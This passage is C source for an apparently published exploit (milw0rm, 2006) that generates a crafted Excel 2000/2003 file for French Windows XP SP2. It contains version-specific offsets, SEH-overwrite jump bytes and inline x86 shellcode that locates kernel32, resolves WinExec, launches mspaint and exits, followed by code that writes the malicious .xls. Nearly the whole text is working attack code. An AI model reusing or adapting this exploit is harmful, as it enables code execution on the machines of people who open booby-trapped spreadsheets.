0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00,
0x00, 0x08, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00,
0x00, 0x0C, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0xFE, 0xFF, 0xFF, 0xFF, 0xFE, 0xFF, 0xFF,
0xFF, 0xFD, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0xFF
};
int shellcode_off7_2003=4123; // Excel 2003
int shellcode_off7_2000=4855; // Excel 2000
unsigned char shellcode_p1_2003[]= {0xEB,0x06,0x43,0x43,
0x24,0xB8,0x34,0x30 // Excel 2003 (reversed address)
};
unsigned char shellcode_p1_2000[]= {0xEB,0x06,0x43,0x43,
0x99,0xD9,0x2C,0x30, // Excel 2000 (reversed address)
0xE9,0x1F,0xFD,0xFF,0xFF
};
unsigned char shellcode[724]; // shellcode max length = 724 bytes
unsigned short buff_size = 0x152e; // approximate your buffer size (0x152e) to fill the stack
// beyond SEH it is variant for different Excel versions
// so again consult your debugger
char *filename="c:\\SpecialExcelFile.xls";
unsigned long InsertShellcode()
{
goto Copy_SC_2_buffer;
__asm
{ // Shellcode (assembled) must be <= to 724 bytes else you'll have a crash
shellcode_start: // during Excel file construction
//****************************** SHELLCODE integrated (start)
jmp first_step // Jump to instruction located just before the entry_point to
second_step: // permit a call back (opcode without null byte)
pop esp // Fix ESP value just before usable shellcode
shr esp,4 // Align ESP to the immediately inferior value dividable by
shl esp,4 // 4 (necessary to execute correctly the WinExec function)
jmp entry_point // Jump to entry_point to start the "real" work
first_step:
call second_step // Load entry_point address in ESP
entry_point:
push 30h
pop ecx
mov eax,fs:[ecx]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov ebx,[eax+08h] // EBX receives base kernel address
push ebx
mov eax,[ebx+3ch]
mov eax,[ebx+eax+78h]
lea esi,[ebx+eax+1ch]
mov cl,03h
load_rva:
lodsd
add eax,ebx
push eax
loop load_rva
pop edx
pop esi
search_funcname:
mov edi,[esi+4*ecx]
inc ecx
cmp dword ptr [ebx+edi+4],'Acor'
jne search_funcname
pop esi
movzx eax,word ptr [edx+2*ecx-2]
add ebx,[esi+4*eax] // EBX receives GetProcAddress address
pop eax // EAX receives base kernel address
xor ecx,ecx // ECX=0
push ecx // Push end of function name string (null character)
push 'cexE' // Function name (in reversed mode)
push 'niWX' // " "
mov ecx,esp // ECX=ESP
inc ecx // 1 "inc ecx" for 1 "X character" in function name string
push ecx // Push function name string address
push eax // Push kernel base address
call ebx // Retrieve WinExec address
mov esi,ebx // ESI receives GetProcAddress address
mov ebx,[esp-8] // EBX receives base kernel address
xor ecx,ecx // ECX=0
push ecx // Push end of program name string (null character)
push 'tnia' // Program name (in reversed mode)
push 'psmX' // " "
mov ecx,esp // ECX=ESP
inc ecx // 1 "inc ecx" for 1 "X character" in program name string
push 1 // Push execution mode (1=SW_SHOW, 0=SW_HIDE)
push ecx // Push program name string address-4
call eax // Execute "mspaint"
xor ecx,ecx // ECX=0
push ecx // Push end of function name string (null character)
push 'ssec' // Function name (in reversed mode)
push 'orPt' // " "
push 'ixEX' // " "
mov ecx,esp // ECX=ESP
inc ecx // 1 "inc ecx" for 1 "X character" in function name string
push ecx // Push function name string address
push ebx // Push kernel base address
call esi // Retrieve ExitProcess address
xor ecx,ecx // ECX=0
push ecx // Push exit code (null to terminate this process)
jmp eax // Terminate this process
//****************************** SHELLCODE integrated (end)
shellcode_end:
}
Copy_SC_2_buffer:
unsigned long sc_buffer_length;
__asm
{
pushad
lea eax,shellcode_end
lea ebx,shellcode_start
sub eax,ebx
mov sc_buffer_length,eax
lea edi,shellcode
copyshellcode:
mov cl,[ebx]
mov [edi],cl
inc ebx
inc edi
dec eax
jnz copyshellcode
mov [edi],al
popad
}
sc_buffer_length++;
return sc_buffer_length;
}
int main()
{
ofstream ofs;
ofs.open(filename,ios::binary | ios::out);
printf("\n-/\\_NSRocket_/\\-\n\n presents\n\n\nMicrosoft Excel 2000 and 2003 exploit for WinXP SP2 french\n**********************************************************\n\n\n\n");
for(int z=0;z<sizeof(stream1);z++)
ofs.put(stream1[z]);
ofs.put((char)(buff_size&0x00ff));
ofs.put((char)(buff_size>>8));
ofs.put('\0');
ofs.put('\0');
//***********************************
for(int i=0;i<=shellcode_off7_2003;i++)
ofs.put('C');
for(z=0;z<sizeof(shellcode_p1_2003);z++)
ofs.put(shellcode_p1_2003[z]);
i+=sizeof(shellcode_p1_2003);
int shellcode_length=(int)InsertShellcode();
for(z=0;z<shellcode_length;z++)
ofs.put(shellcode[z]);
i+=shellcode_length;
for(;i<=shellcode_off7_2000;i++)
ofs.put('C');
for(z=0;z<sizeof(shellcode_p1_2000);z++)
ofs.put(shellcode_p1_2000[z]);
i+=sizeof(shellcode_p1_2000);
for(;i<=(int)(buff_size-4);i++)
ofs.put('C');
//***********************************
for(z=0;z<sizeof(stream2);z++)
ofs.put(stream2[z]);
ofs.close();
printf("Specially crafted Excel file successfully generated in C:\\\n\n");
return 0;
}
// milw0rm.com [2006-07-06]
- Источник
- www.exploit-db.com